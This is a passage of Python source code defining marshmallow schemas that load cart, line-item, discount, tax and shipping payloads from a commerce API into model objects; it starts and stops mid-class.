        nested=helpers.absmod(__name__, ".tax_category.TaxCategoryReferenceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="taxCategory",
    )
    tax_rate = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".tax_category.TaxRateSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="taxRate",
    )
    discounted_price_per_quantity = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".DiscountedLineItemPriceForQuantitySchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="discountedPricePerQuantity",
    )
    custom = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".type.CustomFieldsSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
    )
    shipping_details = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ItemShippingDetailsSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="shippingDetails",
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.CustomLineItem(**data)
class CustomLineItemDraftSchema(helpers.BaseSchema):
    """Schema for a custom line item draft; loads into ``models.CustomLineItemDraft``."""

    name = LocalizedStringField(allow_none=True, missing=None)
    quantity = marshmallow.fields.Integer(allow_none=True, missing=None)
    money = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.MoneySchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
    )
    slug = marshmallow.fields.String(allow_none=True, missing=None)
    tax_category = helpers.LazyNestedField(
        nested=helpers.absmod(
            __name__, ".tax_category.TaxCategoryResourceIdentifierSchema"
        ),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="taxCategory",
    )
    external_tax_rate = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalTaxRate",
    )
    custom = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".type.CustomFieldsDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
    )
    shipping_details = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ItemShippingDetailsDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="shippingDetails",
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.CustomLineItemDraft(**data)
class DiscountCodeInfoSchema(helpers.BaseSchema):
    """Schema pairing a discount-code reference with its state; loads into ``models.DiscountCodeInfo``."""

    discount_code = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".discount_code.DiscountCodeReferenceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="discountCode",
    )
    # Serialized by enum value (by_value=True), not by enum name.
    state = marshmallow_enum.EnumField(
        DiscountCodeState, by_value=True, allow_none=True, missing=None
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.DiscountCodeInfo(**data)
class DiscountedLineItemPortionSchema(helpers.BaseSchema):
    """Schema for one cart-discount's share of a discounted price; loads into ``models.DiscountedLineItemPortion``."""

    discount = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".cart_discount.CartDiscountReferenceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
    )
    # Polymorphic money value, dispatched on its "type" key.
    discounted_amount = helpers.Discriminator(
        allow_none=True,
        discriminator_field=("type", "type"),
        discriminator_schemas={
            "centPrecision": helpers.absmod(
                __name__, ".common.CentPrecisionMoneySchema"
            ),
            "highPrecision": helpers.absmod(
                __name__, ".common.HighPrecisionMoneySchema"
            ),
        },
        missing=None,
        data_key="discountedAmount",
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.DiscountedLineItemPortion(**data)
class DiscountedLineItemPriceSchema(helpers.BaseSchema):
    """Schema for a discounted price plus its contributing discounts; loads into ``models.DiscountedLineItemPrice``."""

    # Polymorphic money value, dispatched on its "type" key.
    value = helpers.Discriminator(
        allow_none=True,
        discriminator_field=("type", "type"),
        discriminator_schemas={
            "centPrecision": helpers.absmod(
                __name__, ".common.CentPrecisionMoneySchema"
            ),
            "highPrecision": helpers.absmod(
                __name__, ".common.HighPrecisionMoneySchema"
            ),
        },
        missing=None,
    )
    included_discounts = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".DiscountedLineItemPortionSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="includedDiscounts",
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.DiscountedLineItemPrice(**data)
class DiscountedLineItemPriceForQuantitySchema(helpers.BaseSchema):
    """Schema mapping a quantity to its discounted price; loads into ``models.DiscountedLineItemPriceForQuantity``."""

    # NOTE(review): quantity is a Float here (unlike the Integer quantities on
    # line-item schemas) — presumably mirroring the upstream API spec; verify.
    quantity = marshmallow.fields.Float(allow_none=True, missing=None)
    discounted_price = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".DiscountedLineItemPriceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="discountedPrice",
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.DiscountedLineItemPriceForQuantity(**data)
class ExternalLineItemTotalPriceSchema(helpers.BaseSchema):
    """Schema for an externally supplied line-item price/total pair; loads into ``models.ExternalLineItemTotalPrice``."""

    price = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.MoneySchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
    )
    total_price = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.MoneySchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="totalPrice",
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.ExternalLineItemTotalPrice(**data)
class ExternalTaxAmountDraftSchema(helpers.BaseSchema):
    """Schema for an externally supplied tax amount; loads into ``models.ExternalTaxAmountDraft``."""

    total_gross = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.MoneySchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="totalGross",
    )
    tax_rate = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="taxRate",
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.ExternalTaxAmountDraft(**data)
class ExternalTaxRateDraftSchema(helpers.BaseSchema):
    """Schema for an externally supplied tax rate; loads into ``models.ExternalTaxRateDraft``."""

    name = marshmallow.fields.String(allow_none=True, missing=None)
    amount = marshmallow.fields.Float(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    country = marshmallow.fields.String(allow_none=True, missing=None)
    state = marshmallow.fields.String(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    sub_rates = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".tax_category.SubRateSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="subRates",
    )
    included_in_price = marshmallow.fields.Boolean(
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="includedInPrice",
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.ExternalTaxRateDraft(**data)
class ItemShippingDetailsSchema(helpers.BaseSchema):
    """Schema for per-item shipping targets with a validity flag; loads into ``models.ItemShippingDetails``."""

    targets = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ItemShippingTargetSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
    )
    valid = marshmallow.fields.Boolean(allow_none=True, missing=None)

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.ItemShippingDetails(**data)
class ItemShippingDetailsDraftSchema(helpers.BaseSchema):
    """Draft counterpart of ``ItemShippingDetailsSchema`` (no ``valid`` flag); loads into ``models.ItemShippingDetailsDraft``."""

    targets = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ItemShippingTargetSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.ItemShippingDetailsDraft(**data)
class ItemShippingTargetSchema(helpers.BaseSchema):
    """Schema assigning a quantity to an address key; loads into ``models.ItemShippingTarget``."""

    address_key = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="addressKey"
    )
    quantity = marshmallow.fields.Float(allow_none=True, missing=None)

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.ItemShippingTarget(**data)
class LineItemSchema(helpers.BaseSchema):
    """Schema for a product line item on a cart; loads into ``models.LineItem``.

    camelCase wire names are mapped to snake_case attributes via ``data_key``;
    the ``totalPrice`` value is polymorphic on its ``type`` key.
    """

    id = marshmallow.fields.String(allow_none=True, missing=None)
    product_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="productId"
    )
    name = LocalizedStringField(allow_none=True, missing=None)
    product_slug = LocalizedStringField(
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="productSlug",
    )
    product_type = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".product_type.ProductTypeReferenceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="productType",
    )
    variant = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".product.ProductVariantSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
    )
    price = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.PriceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
    )
    taxed_price = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".TaxedItemPriceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="taxedPrice",
    )
    total_price = helpers.Discriminator(
        allow_none=True,
        discriminator_field=("type", "type"),
        discriminator_schemas={
            "centPrecision": helpers.absmod(
                __name__, ".common.CentPrecisionMoneySchema"
            ),
            "highPrecision": helpers.absmod(
                __name__, ".common.HighPrecisionMoneySchema"
            ),
        },
        missing=None,
        data_key="totalPrice",
    )
    quantity = marshmallow.fields.Integer(allow_none=True, missing=None)
    added_at = marshmallow.fields.DateTime(
        allow_none=True, metadata={"omit_empty": True}, missing=None, data_key="addedAt"
    )
    state = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".order.ItemStateSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
    )
    tax_rate = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".tax_category.TaxRateSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="taxRate",
    )
    supply_channel = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".channel.ChannelReferenceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="supplyChannel",
    )
    distribution_channel = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".channel.ChannelReferenceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="distributionChannel",
    )
    discounted_price_per_quantity = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".DiscountedLineItemPriceForQuantitySchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="discountedPricePerQuantity",
    )
    # Enum fields serialize by value (by_value=True), not by member name.
    price_mode = marshmallow_enum.EnumField(
        LineItemPriceMode,
        by_value=True,
        allow_none=True,
        missing=None,
        data_key="priceMode",
    )
    line_item_mode = marshmallow_enum.EnumField(
        LineItemMode,
        by_value=True,
        allow_none=True,
        missing=None,
        data_key="lineItemMode",
    )
    custom = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".type.CustomFieldsSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
    )
    shipping_details = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ItemShippingDetailsSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="shippingDetails",
    )
    last_modified_at = marshmallow.fields.DateTime(
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="lastModifiedAt",
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.LineItem(**data)
class LineItemDraftSchema(helpers.BaseSchema):
    """Schema for a line item draft used when creating/updating carts; loads into ``models.LineItemDraft``.

    All fields are optional on the wire (omit_empty + missing=None); the
    product can be identified by productId/variantId or by sku.
    """

    product_id = marshmallow.fields.String(
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="productId",
    )
    variant_id = marshmallow.fields.Integer(
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="variantId",
    )
    sku = marshmallow.fields.String(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    quantity = marshmallow.fields.Integer(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    added_at = marshmallow.fields.DateTime(
        allow_none=True, metadata={"omit_empty": True}, missing=None, data_key="addedAt"
    )
    supply_channel = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".channel.ChannelResourceIdentifierSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="supplyChannel",
    )
    distribution_channel = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".channel.ChannelResourceIdentifierSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="distributionChannel",
    )
    external_tax_rate = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalTaxRate",
    )
    custom = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".type.CustomFieldsDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
    )
    external_price = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.MoneySchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalPrice",
    )
    external_total_price = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ExternalLineItemTotalPriceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalTotalPrice",
    )
    shipping_details = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ItemShippingDetailsDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="shippingDetails",
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.LineItemDraft(**data)
class ReplicaCartDraftSchema(helpers.BaseSchema):
    """Schema for replicating a cart from an existing resource; loads into ``models.ReplicaCartDraft``.

    ``reference`` is polymorphic: the wire ``typeId`` selects which concrete
    Reference schema parses the payload.
    """

    reference = helpers.Discriminator(
        allow_none=True,
        # (payload key, model attribute) pair used for dispatch.
        discriminator_field=("typeId", "type_id"),
        discriminator_schemas={
            "cart-discount": helpers.absmod(
                __name__, ".cart_discount.CartDiscountReferenceSchema"
            ),
            "cart": helpers.absmod(__name__, ".CartReferenceSchema"),
            "category": helpers.absmod(__name__, ".category.CategoryReferenceSchema"),
            "channel": helpers.absmod(__name__, ".channel.ChannelReferenceSchema"),
            "key-value-document": helpers.absmod(
                __name__, ".custom_object.CustomObjectReferenceSchema"
            ),
            "customer-group": helpers.absmod(
                __name__, ".customer_group.CustomerGroupReferenceSchema"
            ),
            "customer": helpers.absmod(__name__, ".customer.CustomerReferenceSchema"),
            "discount-code": helpers.absmod(
                __name__, ".discount_code.DiscountCodeReferenceSchema"
            ),
            "inventory-entry": helpers.absmod(
                __name__, ".inventory.InventoryEntryReferenceSchema"
            ),
            "order-edit": helpers.absmod(
                __name__, ".order_edit.OrderEditReferenceSchema"
            ),
            "order": helpers.absmod(__name__, ".order.OrderReferenceSchema"),
            "payment": helpers.absmod(__name__, ".payment.PaymentReferenceSchema"),
            "product-discount": helpers.absmod(
                __name__, ".product_discount.ProductDiscountReferenceSchema"
            ),
            "product-type": helpers.absmod(
                __name__, ".product_type.ProductTypeReferenceSchema"
            ),
            "product": helpers.absmod(__name__, ".product.ProductReferenceSchema"),
            "review": helpers.absmod(__name__, ".review.ReviewReferenceSchema"),
            "shipping-method": helpers.absmod(
                __name__, ".shipping_method.ShippingMethodReferenceSchema"
            ),
            "shopping-list": helpers.absmod(
                __name__, ".shopping_list.ShoppingListReferenceSchema"
            ),
            "state": helpers.absmod(__name__, ".state.StateReferenceSchema"),
            "store": helpers.absmod(__name__, ".store.StoreReferenceSchema"),
            "tax-category": helpers.absmod(
                __name__, ".tax_category.TaxCategoryReferenceSchema"
            ),
            "type": helpers.absmod(__name__, ".type.TypeReferenceSchema"),
            "zone": helpers.absmod(__name__, ".zone.ZoneReferenceSchema"),
        },
        missing=None,
    )
    key = marshmallow.fields.String(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.ReplicaCartDraft(**data)
class ShippingInfoSchema(helpers.BaseSchema):
    """Schema for a cart's shipping information; loads into ``models.ShippingInfo``."""

    shipping_method_name = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="shippingMethodName"
    )
    # Polymorphic money value, dispatched on its "type" key.
    price = helpers.Discriminator(
        allow_none=True,
        discriminator_field=("type", "type"),
        discriminator_schemas={
            "centPrecision": helpers.absmod(
                __name__, ".common.CentPrecisionMoneySchema"
            ),
            "highPrecision": helpers.absmod(
                __name__, ".common.HighPrecisionMoneySchema"
            ),
        },
        missing=None,
    )
    shipping_rate = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".shipping_method.ShippingRateSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="shippingRate",
    )
    taxed_price = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".TaxedItemPriceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="taxedPrice",
    )
    tax_rate = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".tax_category.TaxRateSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="taxRate",
    )
    tax_category = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".tax_category.TaxCategoryReferenceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="taxCategory",
    )
    shipping_method = helpers.LazyNestedField(
        nested=helpers.absmod(
            __name__, ".shipping_method.ShippingMethodReferenceSchema"
        ),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="shippingMethod",
    )
    deliveries = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".order.DeliverySchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
    )
    discounted_price = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".DiscountedLineItemPriceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="discountedPrice",
    )
    # Serialized by enum value (by_value=True), not by member name.
    shipping_method_state = marshmallow_enum.EnumField(
        ShippingMethodState,
        by_value=True,
        allow_none=True,
        missing=None,
        data_key="shippingMethodState",
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.ShippingInfo(**data)
class ShippingRateInputSchema(helpers.BaseSchema):
    """Base schema for shipping-rate inputs; loads into ``models.ShippingRateInput``.

    Subclasses reuse the ``type`` field as their discriminator.
    """

    type = marshmallow.fields.String(allow_none=True, missing=None)

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        # "type" only selects the schema; the model does not take it.
        del data["type"]
        return models.ShippingRateInput(**data)
class ClassificationShippingRateInputSchema(ShippingRateInputSchema):
    """Schema for the "Classification" shipping-rate input variant; loads into ``models.ClassificationShippingRateInput``."""

    key = marshmallow.fields.String(allow_none=True, missing=None)
    label = LocalizedStringField(allow_none=True, missing=None)

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        # "type" only selects the schema; the model does not take it.
        del data["type"]
        return models.ClassificationShippingRateInput(**data)
class ScoreShippingRateInputSchema(ShippingRateInputSchema):
    """Schema for the "Score" shipping-rate input variant; loads into ``models.ScoreShippingRateInput``."""

    score = marshmallow.fields.Float(allow_none=True, missing=None)

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        # "type" only selects the schema; the model does not take it.
        del data["type"]
        return models.ScoreShippingRateInput(**data)
class ShippingRateInputDraftSchema(helpers.BaseSchema):
    """Base schema for shipping-rate input drafts; loads into ``models.ShippingRateInputDraft``.

    Subclasses reuse the ``type`` field as their discriminator.
    """

    type = marshmallow.fields.String(allow_none=True, missing=None)

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        # "type" only selects the schema; the model does not take it.
        del data["type"]
        return models.ShippingRateInputDraft(**data)
class ClassificationShippingRateInputDraftSchema(ShippingRateInputDraftSchema):
    """Schema for the "Classification" shipping-rate input draft; loads into ``models.ClassificationShippingRateInputDraft``."""

    key = marshmallow.fields.String(allow_none=True, missing=None)

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        # "type" only selects the schema; the model does not take it.
        del data["type"]
        return models.ClassificationShippingRateInputDraft(**data)
class ScoreShippingRateInputDraftSchema(ShippingRateInputDraftSchema):
    """Schema for the "Score" shipping-rate input draft; loads into ``models.ScoreShippingRateInputDraft``."""

    score = marshmallow.fields.Float(allow_none=True, missing=None)

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        # "type" only selects the schema; the model does not take it.
        del data["type"]
        return models.ScoreShippingRateInputDraft(**data)
class TaxPortionSchema(helpers.BaseSchema):
    """Schema for one tax portion of a taxed price; loads into ``models.TaxPortion``."""

    name = marshmallow.fields.String(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    rate = marshmallow.fields.Float(allow_none=True, missing=None)
    # Polymorphic money value, dispatched on its "type" key.
    amount = helpers.Discriminator(
        allow_none=True,
        discriminator_field=("type", "type"),
        discriminator_schemas={
            "centPrecision": helpers.absmod(
                __name__, ".common.CentPrecisionMoneySchema"
            ),
            "highPrecision": helpers.absmod(
                __name__, ".common.HighPrecisionMoneySchema"
            ),
        },
        missing=None,
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.TaxPortion(**data)
class TaxPortionDraftSchema(helpers.BaseSchema):
    """Draft counterpart of ``TaxPortionSchema`` (plain Money amount); loads into ``models.TaxPortionDraft``."""

    name = marshmallow.fields.String(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    rate = marshmallow.fields.Float(allow_none=True, missing=None)
    amount = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.MoneySchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.TaxPortionDraft(**data)
class TaxedItemPriceSchema(helpers.BaseSchema):
    """Schema for an item's net/gross taxed price; loads into ``models.TaxedItemPrice``.

    Both totals are polymorphic money values dispatched on their ``type`` key.
    """

    total_net = helpers.Discriminator(
        allow_none=True,
        discriminator_field=("type", "type"),
        discriminator_schemas={
            "centPrecision": helpers.absmod(
                __name__, ".common.CentPrecisionMoneySchema"
            ),
            "highPrecision": helpers.absmod(
                __name__, ".common.HighPrecisionMoneySchema"
            ),
        },
        missing=None,
        data_key="totalNet",
    )
    total_gross = helpers.Discriminator(
        allow_none=True,
        discriminator_field=("type", "type"),
        discriminator_schemas={
            "centPrecision": helpers.absmod(
                __name__, ".common.CentPrecisionMoneySchema"
            ),
            "highPrecision": helpers.absmod(
                __name__, ".common.HighPrecisionMoneySchema"
            ),
        },
        missing=None,
        data_key="totalGross",
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.TaxedItemPrice(**data)
class TaxedPriceSchema(helpers.BaseSchema):
    """Schema for a cart's taxed price with its tax portions; loads into ``models.TaxedPrice``.

    Both totals are polymorphic money values dispatched on their ``type`` key.
    """

    total_net = helpers.Discriminator(
        allow_none=True,
        discriminator_field=("type", "type"),
        discriminator_schemas={
            "centPrecision": helpers.absmod(
                __name__, ".common.CentPrecisionMoneySchema"
            ),
            "highPrecision": helpers.absmod(
                __name__, ".common.HighPrecisionMoneySchema"
            ),
        },
        missing=None,
        data_key="totalNet",
    )
    total_gross = helpers.Discriminator(
        allow_none=True,
        discriminator_field=("type", "type"),
        discriminator_schemas={
            "centPrecision": helpers.absmod(
                __name__, ".common.CentPrecisionMoneySchema"
            ),
            "highPrecision": helpers.absmod(
                __name__, ".common.HighPrecisionMoneySchema"
            ),
        },
        missing=None,
        data_key="totalGross",
    )
    tax_portions = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".TaxPortionSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="taxPortions",
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.TaxedPrice(**data)
class TaxedPriceDraftSchema(helpers.BaseSchema):
    """Schema that deserializes a `TaxedPriceDraft` payload into
    :class:`models.TaxedPriceDraft`; unknown keys are ignored."""

    total_net = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.MoneySchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="totalNet",
    )
    total_gross = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.MoneySchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="totalGross",
    )
    tax_portions = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".TaxPortionDraftSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="taxPortions",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        return models.TaxedPriceDraft(**data)
class CartAddCustomLineItemActionSchema(CartUpdateActionSchema):
    """Schema for the `addCustomLineItem` cart update action; loads into
    :class:`models.CartAddCustomLineItemAction`."""

    money = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.MoneySchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
    )
    name = LocalizedStringField(allow_none=True, missing=None)
    quantity = marshmallow.fields.Integer(allow_none=True, missing=None)
    slug = marshmallow.fields.String(allow_none=True, missing=None)
    tax_category = helpers.LazyNestedField(
